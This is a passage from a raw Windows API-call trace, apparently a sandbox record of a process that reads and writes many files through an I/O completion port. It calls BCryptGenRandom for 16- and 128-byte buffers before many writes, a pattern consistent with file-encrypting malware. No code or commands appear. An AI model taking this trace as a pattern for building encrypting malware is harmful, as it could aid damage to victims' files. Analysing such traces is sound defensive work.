(_Block=0x1fa90b8) [0152.137] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.143] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.144] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0152.144] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.144] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0152.145] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.145] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.145] free (_Block=0x3e305b8) [0152.145] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.145] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.145] free (_Block=0x1fa91d0) [0152.145] free (_Block=0x1fa2ed8) [0152.145] free (_Block=0x1fa90b8) [0152.145] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.145] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.149] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x25d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0152.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.157] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.158] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0152.158] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.158] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0152.158] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.158] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.159] free (_Block=0x3e305b8) [0152.159] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.159] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.159] free (_Block=0x1fa91d0) [0152.159] free (_Block=0x1fa2ed8) [0152.159] free (_Block=0x1fa90b8) [0152.159] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0152.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.180] CloseHandle (hObject=0x170) returned 1 [0152.181] free (_Block=0x1ff1e60) [0152.181] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.192] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1d4a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0152.203] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.213] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.213] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.219] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.238] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x7cc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0152.238] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.261] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xaf00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0152.262] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0152.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.272] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0152.272] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.272] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.272] free (_Block=0x3e305b8) [0152.272] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.272] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.273] free (_Block=0x1fa91d0) [0152.273] free (_Block=0x1fa2ed8) [0152.273] free (_Block=0x1fa90b8) [0152.273] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.278] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.278] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.290] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.291] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0152.291] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.291] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0152.292] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.292] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.292] free (_Block=0x3e305b8) [0152.292] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.292] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.292] free (_Block=0x1fa91d0) [0152.292] free (_Block=0x1fa2ed8) [0152.293] free (_Block=0x1fa90b8) [0152.293] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0152.293] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.294] CloseHandle (hObject=0x338) returned 1 [0152.294] free (_Block=0x1ff1e60) [0152.294] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.295] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x81d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0152.295] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.611] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x244a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0152.611] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.612] CloseHandle (hObject=0x308) returned 1 [0152.612] free (_Block=0x3e70008) [0152.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.632] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.633] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.633] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0152.633] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.634] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0152.634] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.634] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.634] free (_Block=0x3e305b8) [0152.634] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.634] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.635] free (_Block=0x1fa91d0) [0152.635] free (_Block=0x1fa2ed8) [0152.635] free (_Block=0x1fa90b8) [0152.635] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.635] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.647] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.647] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0152.648] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.648] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0152.648] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.648] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.648] free (_Block=0x3e305b8) [0152.648] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.648] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.649] free (_Block=0x1fa91d0) [0152.649] free (_Block=0x1fa2ed8) [0152.649] free (_Block=0x1fa90b8) [0152.649] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0152.649] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.657] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.657] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0152.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0152.659] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.659] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.659] free (_Block=0x3e305b8) [0152.659] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.659] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.659] free (_Block=0x1fa91d0) [0152.659] free (_Block=0x1fa2ed8) [0152.659] free (_Block=0x1fa90b8) [0152.659] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0152.660] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.676] CloseHandle (hObject=0x308) returned 1 [0152.677] free (_Block=0x3df0008) [0152.677] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.697] CloseHandle (hObject=0x3cc) returned 1 [0152.697] free (_Block=0x1ff1e60) [0152.698] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.712] CloseHandle (hObject=0x338) returned 1 [0152.712] free (_Block=0x3d70450) [0152.712] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.723] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x60dc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0152.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.747] CloseHandle (hObject=0x308) returned 1 [0152.749] free (_Block=0x3df0008) [0152.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.759] CloseHandle (hObject=0x3cc) returned 1 [0152.759] free (_Block=0x1ff1e60) [0152.759] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.762] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x9b3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0152.789] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.789] CloseHandle (hObject=0xec) returned 1 [0152.789] free (_Block=0x3e70008) [0152.790] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.860] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0152.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0152.861] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0152.861] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0152.861] free (_Block=0x3e305b8) [0152.861] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0152.861] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0152.861] free (_Block=0x1fa91d0) [0152.861] free (_Block=0x1fa2ed8) [0152.861] free (_Block=0x1fa90b8) [0152.861] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.862] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.863] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0152.863] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.919] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd9a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0152.920] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.930] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1ca8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0152.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.952] CloseHandle (hObject=0xec) returned 1 [0152.953] free (_Block=0x1ff1e60) [0152.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.962] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x8ae0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0152.962] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0152.969] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x65a6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0152.977] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0153.014] CloseHandle (hObject=0xec) returned 1 [0153.014] free (_Block=0x1ff1e60) [0153.014] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, 